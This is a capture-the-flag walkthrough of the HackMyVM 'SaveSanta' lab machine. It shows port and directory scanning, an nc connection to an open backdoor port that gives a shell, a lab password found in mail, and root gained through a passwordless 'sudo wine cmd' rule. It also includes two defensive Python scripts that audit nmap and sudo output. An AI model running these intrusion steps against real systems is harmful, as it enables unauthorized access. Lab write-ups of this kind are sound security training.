Introduction
Difficulty: Easy
Target URL: https://hackmyvm.eu/machines/machine.php?vm=SaveSanta
Local environment
VM: VirtualBox
Target IP (SaveSanta): 192.168.56.103
Attacker machine IP (Windows 10): 192.168.56.1
Scanning
A quick scan of the common ports first
http
python3 dirsearch.py -e php -t 10 -x 403 -u http://192.168.56.103/
_|. _ _ _ _ _ _|_ v0.4.3 by 鹏组安全
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 10 | Wordlist size: 9567
Output File: E:\1_tool\12_HVV\ONE-FOX集成工具箱_V6公开版_by狐狸\gui_scan\dirsearch\reports\http_192.168.56.103\__24-03-19_17-26-01.txt
Target: http://192.168.56.103/
[17:26:01] Starting:
[17:26:07] 301 - 245B - /administration -> http://192.168.56.103/administration/
[17:26:07] 301 - 240B - /administration/ -> http://192.168.56.103/media.html
[17:26:07] 301 - 240B - /administration/Sym.php -> http://192.168.56.103/media.html
[17:26:14] 301 - 241B - /javascript -> http://192.168.56.103/javascript/
[17:26:21] 200 - 69B - /robots.txt
Task Completeds
However, after checking these paths, only robots.txt had anything of interest:
Disallow: /
Disallow: /administration/
Disallow: /santa
/administration redirects to http://192.168.56.103/media.html
/santa is a login page
I had intended to keep probing here, but after that one visit I could never reach this page again.
No matter how I scanned I could not find anything new, and I assumed the site had crashed. I rebooted the target and rescanned all ports, and that turned up an unexpected find.
nmap -T5 -sS -Pn -p 1-65530 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 18:25 CST
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
49956/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds
Connecting with nc gives a shell
rlwrap -cAr nc 192.168.56.103 49956
ls
user.txt
whoami
alabaster
That gives the user flag.
rlwrap improves the interactive experience of a reverse shell; prefixing nc with it does no harm.
Privilege escalation
Upgrade the shell first
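As an added defender-side check, not part of the original writeup: the script below parses nmap "normal" output like the full-port scan above and flags open ports that are missing from a documented baseline, ranking a port whose service nmap cannot name (as with 49956 here) highest. The sample output, the baseline set and the severity labels are assumptions constructed for this example.

```python
from __future__ import annotations
import re

# Constructed sample of nmap "normal" output, modelled on the scan shown above
# (sample data for this example, not a live capture).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 18:25 CST
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
49956/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds
"""

# Assumed baseline: the services this host is documented to expose.
EXPECTED_PORTS = {22, 25, 80, 110}

# One nmap port line: "<port>/<proto> <state> <service>".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_open_ports(nmap_output: str) -> list[tuple[int, str, str]]:
    """Return (port, protocol, service) for every port nmap reports as open."""
    found = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m["state"] == "open":
            found.append((int(m["port"]), m["proto"], m["service"]))
    return found


def unexpected_ports(nmap_output: str, expected: set[int]) -> list[tuple[int, str, str]]:
    """Open ports that are not in the baseline, i.e. what a reviewer should look at."""
    return [p for p in parse_open_ports(nmap_output) if p[0] not in expected]


def describe(port: int, proto: str, service: str) -> str:
    """Rank the finding: an open port nmap cannot even name is the most suspicious."""
    severity = "HIGH" if service == "unknown" else "MEDIUM"
    return f"[{severity}] {port}/{proto} ({service}) is open but not in the baseline"


if __name__ == "__main__":
    for port, proto, service in unexpected_ports(SAMPLE_NMAP_OUTPUT, EXPECTED_PORTS):
        print(describe(port, proto, service))
```

Run against a periodic full-port scan of your own hosts, a listener like the one on 49956 (which handed out an unauthenticated shell as alabaster) shows up as a HIGH finding the first time it appears.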
/usr/bin/script -qc /bin/bash /dev/null
Upload linpeas; it reports that mail has a vulnerability.
The vulnerability itself is not directly usable, but it shows that the user must be running a mail-related service. Running mail reveals one message:
Key information:
bill/JingleBellsPhishingSmellsHackersGoAway
Connect over ssh and log in successfully as the bill user.
sudo -l shows that wine can be run without a password:
bill@santa:/$ sudo -l
Matching Defaults entries for bill on santa:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User bill may run the following commands on santa:
(ALL) NOPASSWD: /usr/bin/wine
wine is used to emulate a Windows environment, so we can simply run cmd through it to get a "Windows" shell:
sudo wine cmd
Z:\home\bill>whoami
0118:err:winediag:ntlm_check_version ntlm_auth was not found. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
0118:err:ntlm:ntlm_LsaApInitializePackage no NTLM support, expect problems
SANTA\root
With that, we have root.
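As an added audit check, not part of the original writeup: the script below parses `sudo -l` output of the form shown for bill above and flags NOPASSWD rules whose target binary will run an arbitrary program for the caller, which makes the rule equivalent to a passwordless root shell. The sample output (with extra invented rules) and the list of launcher binaries are assumptions constructed for this example; wine is the only entry taken from this page.

```python
from __future__ import annotations
import re

# Constructed `sudo -l` output, modelled on the one shown for bill above
# (sample data for this example; the second and third rules are invented).
SAMPLE_SUDO_L = """\
Matching Defaults entries for bill on santa:
    env_reset, mail_badpass, use_pty

User bill may run the following commands on santa:
    (ALL) NOPASSWD: /usr/bin/wine
    (root) /usr/bin/systemctl restart postfix
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update
"""

# Binaries that will run an arbitrary program for the caller. wine is the one
# this writeup uses; the others are common interpreters/launchers (assumed
# list, extend it for your environment).
LAUNCHERS = {
    "/usr/bin/wine", "/usr/bin/env", "/bin/sh", "/bin/bash",
    "/usr/bin/python3", "/usr/bin/perl",
}

# One rule line: "(runas) [TAG: ...] /path/to/cmd [args]"
RULE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_rules(sudo_l_output: str) -> list[dict]:
    """Parse the command list of `sudo -l` into one dict per rule."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        s = line.strip()
        if s.startswith("User ") and "may run the following commands" in s:
            in_rules = True  # everything after this header is a rule line
            continue
        if not in_rules or not s:
            continue
        m = RULE.match(s)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        rules.append({
            "runas": m["runas"].strip(),
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m["cmd"],
            "args": m["args"].strip(),
        })
    return rules


def risky_rules(rules: list[dict]) -> list[dict]:
    """NOPASSWD rules on a launcher: a passwordless shell as the runas user."""
    return [r for r in rules if r["nopasswd"] and r["cmd"] in LAUNCHERS]


if __name__ == "__main__":
    for r in risky_rules(parse_rules(SAMPLE_SUDO_L)):
        print(f"RISK: {r['cmd']} runnable as ({r['runas']}) without a password")
```

The fix for a flagged rule is to restrict it to a specific, non-launcher command with fixed arguments (as the invented systemctl rule does) or to drop NOPASSWD; granting wine as root is indistinguishable, in effect, from granting a root shell.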